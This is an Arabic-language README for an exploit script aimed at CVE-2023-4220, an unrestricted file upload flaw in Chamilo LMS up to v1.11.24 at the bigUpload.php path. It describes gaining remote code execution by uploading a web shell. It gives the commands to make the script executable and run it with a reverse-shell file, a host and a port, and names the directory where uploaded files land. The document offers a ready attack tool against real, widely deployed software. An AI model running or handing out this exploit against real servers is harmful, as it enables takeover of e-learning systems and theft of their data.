
هذا استغلال (Exploit) لثغرة رفع الملفات غير المقيد (Unrestricted File Upload) في وظيفة رفع الملفات الكبيرة في Chamilo-LMS لهذا المسار "/main/inc/lib/javascript/bigupload/inc/bigUpload.php" في Chamilo LMS <= v1.11.24، ويمكن للمهاجمين تحقيق تنفيذ تعليمات برمجية عن بُعد (Remote Code Execution) عبر رفع ويب شيل (Web Shell).
هذا هو استغلال لرفع الملفات غير المقيّد في وظيفة رفع الملفات الكبيرة في Chamilo-LMS لهذا المسار /main/inc/lib/javascript/bigupload/inc/bigUpload.php في Chamilo LMS <= v1.11.24، ويمكن للمهاجمين الحصول على تنفيذ التعليمات البرمجية عن بُعد عبر رفع قشرة ويب. ثم يسمح برفع ملفات عشوائية إلى دليل /main/inc/lib/javascript/bigupload/files.
-يمكنك أولاً تشغيل الأداة لمعرفة كيفية استخدامها كما يلي:
chmod +x CVE-2023-4220.sh
./CVE-2023-4220.sh
-ثم تحتاج إلى إدخال المدخلات المطلوبة كما يلي:
~$ ./CVE-2023-4220.sh -f reverse_file -h host_link -p port_in_the_reverse_file
-هنا يمكننا العثور على الملف المرفوع على الخادم
http://target.test/main/inc/lib/javascript/bigupload/files/
